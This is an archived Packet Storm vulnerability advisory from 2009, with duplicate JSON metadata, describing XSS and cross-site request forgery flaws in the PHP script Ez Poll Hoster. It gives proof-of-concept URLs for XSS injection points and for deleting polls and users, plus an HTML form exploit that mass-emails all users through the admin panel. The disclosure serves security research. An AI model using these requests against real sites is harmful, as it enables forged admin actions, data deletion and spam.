ID PACKETSTORM:83837 Type packetstorm Reporter Milos Zivanovic Modified 2009-12-15T00:00:00
Description
`[#-----------------------------------------------------------------------------------------------#]
[#] Title: Ez Poll Hoster Multiple XSS and XSRF Vulnerabilities
[#] Author: Milos Zivanovic
[#] Email: milosz.security[at]gmail.com
[#] Date: 14. December 2009.
[#-----------------------------------------------------------------------------------------------#]
[#] Application: Ez Poll Hoster
[#] Version: the only one there is
[#] Platform: PHP
[#] Link: http://www.scriptsez.net/?action=details&cat=Polls%20and%20Voting&id=1193942206
[#] Price: 15 USD
[#] Vulnerability: Multiple XSS and XSRF Vulnerabilities
[#-----------------------------------------------------------------------------------------------#]
[#]Content
|--User panel
| |--XSS in user panel
| |--Delete poll by name
|
|--Admin panel
|--XSS in admin panel
|--Delete user by name
|--Email all users
[#]User panel
[-]XSS in user panel
[POC----------------------------------------------------------------------------------------------]
http://localhost/eph/index.php?action=code&pid=[XSS]
[POC----------------------------------------------------------------------------------------------]
[-]Delete poll by name
[POC----------------------------------------------------------------------------------------------]
http://localhost/eph/index.php?action=delete_poll&pid=[POLL
NAME]&do=true&is_js_confirmed=1
[POC----------------------------------------------------------------------------------------------]
[#]Admin panel
[-]XSS in admin panel
[POC----------------------------------------------------------------------------------------------]
http://localhost/eph/profile.php?action=view&uid=[XSS]
[POC----------------------------------------------------------------------------------------------]
[-]Delete user by name
[POC----------------------------------------------------------------------------------------------]
http://localhost/eph/admin.php?action=manage&do=delete&uid=[USER
NAME]&is_js_confirmed=1
[POC----------------------------------------------------------------------------------------------]
[-]Email all users
[EXPLOIT------------------------------------------------------------------------------------------]
<form action="http://localhost/eph/admin.php?action=email&do=true"
method="post">
<input type="hidden" name="subject" value="this is my subject">
<input type="hidden" name="message" value="this is my message">
<input type="submit" name="submit" value="Submit">
</form>
[EXPLOIT------------------------------------------------------------------------------------------]
[#] EOF
`
{"hash": "2a9414b1aacd20ed7476cdbe59925dfd5fe3e6eedd06b290618a108615e08019", "sourceHref": "https://packetstormsecurity.com/files/download/83837/ezpollhoster-xssxsrf.txt", "title": "Ez Poll Hoster XSS / XSRF", "id": "PACKETSTORM:83837", "published": "2009-12-15T00:00:00", "description": "", "modified": "2009-12-15T00:00:00", "sourceData": "`[#-----------------------------------------------------------------------------------------------#] \n[#] Title: Ez Poll Hoster Multiple XSS and XSRF Vulnerabilities \n[#] Author: Milos Zivanovic \n[#] Email: milosz.security[at]gmail.com \n[#] Date: 14. December 2009. \n[#-----------------------------------------------------------------------------------------------#] \n[#] Application: Ez Poll Hoster \n[#] Version: the only one there is \n[#] Platform: PHP \n[#] Link: http://www.scriptsez.net/?action=details&cat=Polls%20and%20Voting&id=1193942206 \n[#] Price: 15 USD \n[#] Vulnerability: Multiple XSS and XSRF Vulnerabilities \n[#-----------------------------------------------------------------------------------------------#] \n \n[#]Content \n|--User panel \n| |--XSS in user panel \n| |--Delete poll by name \n| \n|--Admin panel \n|--XSS in admin panel \n|--Delete user by name \n|--Email all users \n \n[#]User panel \n \n[-]XSS in user panel \n \n[POC----------------------------------------------------------------------------------------------] \nhttp://localhost/eph/index.php?action=code&pid=[XSS] \n[POC----------------------------------------------------------------------------------------------] \n \n[-]Delete poll by name \n \n[POC----------------------------------------------------------------------------------------------] \nhttp://localhost/eph/index.php?action=delete_poll&pid=[POLL \nNAME]&do=true&is_js_confirmed=1 \n[POC----------------------------------------------------------------------------------------------] \n \n[#]Admin panel \n \n[-]XSS in admin panel \n \n[POC----------------------------------------------------------------------------------------------] \nhttp://localhost/eph/profile.php?action=view&uid=[XSS] \n[POC----------------------------------------------------------------------------------------------] \n \n[-]Delete user by name \n \n[POC----------------------------------------------------------------------------------------------] \nhttp://localhost/eph/admin.php?action=manage&do=delete&uid=[USER \nNAME]&is_js_confirmed=1 \n[POC----------------------------------------------------------------------------------------------] \n \n[-]Email all users \n \n[EXPLOIT------------------------------------------------------------------------------------------] \n<form action=\"http://localhost/eph/admin.php?action=email&do=true\" \nmethod=\"post\"> \n<input type=\"hidden\" name=\"subject\" value=\"this is my subject\"> \n<input type=\"hidden\" name=\"message\" value=\"this is my message\"> \n<input type=\"submit\" name=\"submit\" value=\"Submit\"> \n</form> \n[EXPLOIT------------------------------------------------------------------------------------------] \n \n[#] EOF \n`\n", "reporter": "Milos Zivanovic", "hashmap": [{"key": "bulletinFamily", "hash": "708697c63f7eb369319c6523380bdf7a"}, {"key": "cvelist", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "cvss", "hash": "d4be9c4fc84262b4f39f89565918568f"}, {"key": "description", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "href", "hash": "4af274d08f15c98585f5a08321b588e1"}, {"key": "modified", "hash": "ff40bcbe8dac11fce12becae8749491d"}, {"key": "objectVersion", "hash": "56765472680401499c79732468ba4340"}, {"key": "published", "hash": "ff40bcbe8dac11fce12becae8749491d"}, {"key": "references", "hash": "d41d8cd98f00b204e9800998ecf8427e"}, {"key": "reporter", "hash": "96dc648bb9b9a8a479174bc4d75e80eb"}, {"key": "sourceData", "hash": "469dcc1e2cd438dee1603c6374c8857e"}, {"key": "sourceHref", "hash": "05ccdc20e043ff13387f14500de86a8d"}, {"key": "title", "hash": "4dea689e1a81b86cd04123d4f7d45c7f"}, {"key": "type", "hash": "6466ca3735f647eeaed965d9e71bd35d"}], "cvss": {"vector": "NONE", "score": 0.0}, "references": [], "type": "packetstorm", "cvelist": [], "history": [], "bulletinFamily": "exploit", "objectVersion": "1.2", "edition": 1, "href": "https://packetstormsecurity.com/files/83837/Ez-Poll-Hoster-XSS-XSRF.html", "lastseen": "2016-11-03T10:27:00", "viewCount": 0, "enchantments": {"vulnersScore": 7.5}}